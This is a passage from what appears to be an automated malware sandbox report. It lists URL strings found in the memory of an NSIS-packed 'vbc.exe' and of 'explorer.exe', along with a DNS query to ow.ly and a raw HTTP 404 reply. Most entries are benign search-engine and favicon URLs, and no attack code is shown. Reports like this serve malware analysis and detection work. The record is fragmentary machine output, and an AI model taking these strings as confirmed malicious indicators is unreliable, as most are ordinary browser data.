          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: ow.ly
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 09:27:26 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 73 61 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nsag/ was not found on this server.</p></body></html>
          Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2184570235.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
